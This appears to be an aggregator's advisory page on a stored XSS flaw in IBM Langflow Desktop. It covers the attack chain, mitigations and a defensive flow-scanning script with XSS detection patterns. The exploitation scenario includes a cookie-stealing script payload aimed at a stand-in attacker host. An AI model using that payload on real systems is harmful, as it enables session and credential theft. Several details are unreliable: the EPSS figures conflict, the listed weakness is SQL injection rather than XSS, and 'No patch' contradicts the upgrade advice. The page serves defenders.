CVE-2026-3346: Langflow Desktop: stored XSS enables credential theft

MEDIUM
Published April 30, 2026
CISO Take

IBM Langflow Desktop versions 1.6.0–1.8.4 contain a stored XSS vulnerability that allows any authenticated user to inject arbitrary JavaScript into the web UI, persisting across sessions and executing in the context of other users' trusted sessions. The blast radius extends to any credentials, API keys, or session tokens visible within the Langflow interface — in AI deployments this typically means LLM API keys (OpenAI, Anthropic, etc.) and pipeline secrets. Although the absolute EPSS score is low (0.00029), it ranks in the top 92nd percentile of CVEs by exploitation likelihood, and the low-complexity, network-accessible attack vector with no user interaction requirement (CVSS AC:L/UI:N/S:C) lowers the bar significantly for lateral movement within AI infrastructure. Immediately upgrade to a version beyond 1.8.4 per IBM advisory (ibm.com/support/pages/node/7271095); if patching is delayed, restrict Langflow UI access to trusted internal networks and audit stored flow configurations for unexpected script content.

Sources: NVD, EPSS, ATLAS, ibm.com

What is the risk?

Medium severity with elevated exploitation concern for AI-specific deployments. The CVSS 6.4 score understates operational risk in AI pipeline contexts where the Langflow UI stores LLM provider API keys and workflow secrets. Requires only low-privilege authenticated access with network reachability — achievable via any trial/shared account or compromised developer credential. Scope change (S:C) indicates impact crosses trust boundaries. SSVC decision of TRACK is appropriate for general environments, but organizations using Langflow to orchestrate production AI workflows should treat this as higher priority given credential theft potential.

How does the attack unfold?

  1. Initial Access (AML.T0012): Authenticated low-privilege attacker gains access to Langflow web UI using a valid developer or trial account.

  2. Payload Injection (AML.T0049): Attacker embeds malicious JavaScript in a persistent UI field (flow name, description, or node label) that is stored in the application database.

  3. Credential Harvesting (AML.T0083): When a privileged user opens the affected page, the stored XSS payload executes silently in their authenticated session, harvesting LLM API keys, session cookies, and visible secrets.

  4. Exfiltration & Pivot (AML.T0025): Stolen credentials are beaconed to an attacker-controlled server; the attacker reuses API keys to access LLM providers or connected downstream systems outside the victim environment.

What systems are affected?

Package: Langflow
Ecosystem: pip
Vulnerable Range:
Patched: No patch

Do you use Langflow? You're affected.

How severe is it?

CVSS 3.1: 6.4 / 10
EPSS: 0.2% chance of exploitation in 30 days (higher than 5% of all CVEs)
Exploitation Status: No known exploitation
Sophistication: Trivial

What is the attack surface?

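AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): Low
UI (User Interaction): None
S (Scope): Changed
C (Confidentiality): Low
I (Integrity): Low
A (Availability): None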

What should I do?

5 steps
  1. Patch: Upgrade IBM Langflow Desktop to the latest version beyond 1.8.4 per IBM advisory at ibm.com/support/pages/node/7271095.

  2. Network isolation: If immediate patching is not possible, restrict Langflow web UI to localhost or VPN-only access to prevent multi-user exposure.

  3. Credential rotation: Audit and rotate all LLM provider API keys and integration secrets stored within Langflow flow configurations.

  4. Detection: Review Langflow flow definitions and node configurations for unexpected <script> tags or obfuscated JavaScript in string fields. Enable Content-Security-Policy headers if running self-hosted.

  5. Access control: Enforce least-privilege on Langflow user accounts; limit who can create or edit flows in shared environments.
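
The audit in step 4 can be scripted. The following is an added example, not code from IBM or the Langflow project: it walks any JSON flow export and reports string fields containing script-capable markup, decoding one layer of HTML-entity and percent-encoding first. The sample flow and its field names are constructed for illustration and are not Langflow's actual export schema.

```python
import html
import json
import re
from urllib.parse import unquote

# Patterns for markup that can execute script when rendered unescaped.
PATTERNS = {
    "script tag": re.compile(r"<\s*script\b", re.I),
    "inline event handler": re.compile(r"<[^>]*\bon[a-z]+\s*=", re.I),
    "javascript: URI": re.compile(r"javascript\s*:", re.I),
    "embedding tag": re.compile(r"<\s*(iframe|object|embed|svg)\b", re.I),
}

def normalize(value):
    """Undo one layer of HTML-entity and percent-encoding before matching."""
    return unquote(html.unescape(value))

def scan(node, path="$"):
    """Walk any JSON value; return (json_path, reason) per suspicious string."""
    findings = []
    if isinstance(node, dict):
        for key, child in node.items():
            findings += scan(child, f"{path}.{key}")
    elif isinstance(node, list):
        for i, child in enumerate(node):
            findings += scan(child, f"{path}[{i}]")
    elif isinstance(node, str):
        text = normalize(node)
        for reason, rx in PATTERNS.items():
            if rx.search(text):
                findings.append((path, reason))
    return findings

# Constructed sample; field names are illustrative, not Langflow's real schema.
SAMPLE_FLOW = json.loads(r"""
{
  "name": "Quarterly summary",
  "description": "&lt;script&gt;/* placeholder */&lt;/script&gt;",
  "nodes": [
    {"label": "Prompt", "note": "Uses <b>bold</b> text"},
    {"label": "<img src=x onerror=1>", "note": "plain"}
  ]
}
""")

if __name__ == "__main__":
    for where, why in scan(SAMPLE_FLOW):
        print(f"{where}: {why}")
```

Treat hits as leads for manual review: benign formatting such as the `<b>` note is ignored, but prose that merely mentions "javascript:" will also match.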

What does CISA's SSVC say?

Decision: Track
Exploitation: none
Automatable: No
Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Article 15 - Accuracy, robustness and cybersecurity
ISO 42001: A.6.2.5 - Protection of AI system resources
NIST AI RMF: MANAGE 2.2 - Mechanisms to sustain the value of AI systems over time
OWASP LLM Top 10: LLM02:2025 - Sensitive Information Disclosure; LLM05:2025 - Improper Output Handling

Frequently Asked Questions

Is CVE-2026-3346 actively exploited?

No confirmed active exploitation of CVE-2026-3346 has been reported, but organizations should still patch proactively.

What systems are affected by CVE-2026-3346?

This vulnerability affects the following AI/ML architecture patterns: LLM application development platforms, Agent frameworks, Workflow automation pipelines, Multi-user AI development environments.

What is the CVSS score for CVE-2026-3346?

CVE-2026-3346 has a CVSS v3.1 base score of 6.4 (MEDIUM). The EPSS exploitation probability is 0.16%.

What is the AI security impact?

Affected AI Architectures

LLM application development platforms
Agent frameworks
Workflow automation pipelines
Multi-user AI development environments

MITRE ATLAS Techniques

AML.T0025 Exfiltration via Cyber Means
AML.T0049 Exploit Public-Facing Application
AML.T0055 Unsecured Credentials
AML.T0083 Credentials from AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.2.5
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM02:2025, LLM05:2025

What are the technical details?

Original Advisory

IBM Langflow Desktop 1.6.0 through 1.8.4 Langflow is vulnerable to stored cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.

Exploitation Scenario

An attacker with low-privilege Langflow access (e.g., a developer account in a shared AI team environment) names a flow or embeds JavaScript in a flow description field: <script>fetch('https://attacker.com/collect?c='+document.cookie)</script>. When a Langflow administrator or colleague opens the flows dashboard, the stored payload executes in their authenticated browser session, silently exfiltrating their session token and any LLM API keys rendered on the page. The attacker then uses those credentials to access the victim's OpenAI or Anthropic account, enumerate deployed models, or pivot into connected data sources via Langflow's integration nodes — all without triggering alerts since they operate under a legitimate API key.

Weaknesses (CWE)

CWE-89 — Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'): The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. For example, consider using persistence layers such as Hibernate or Enterprise Java Beans, which can provide significant protection against SQL injection if used properly.
  • [Architecture and Design] If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. Process SQL queries using prepared statements, parameterized queries, or stored procedures. These features should accept parameters or variables and support strong typing. Do not dynamically construct and execute query strings within these features using "exec" or similar functionality, since this may re-introduce the possibility of SQL injection. [REF-867]

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Timeline

Published
April 30, 2026
Last Modified
May 11, 2026
First Seen
April 30, 2026

Related Vulnerabilities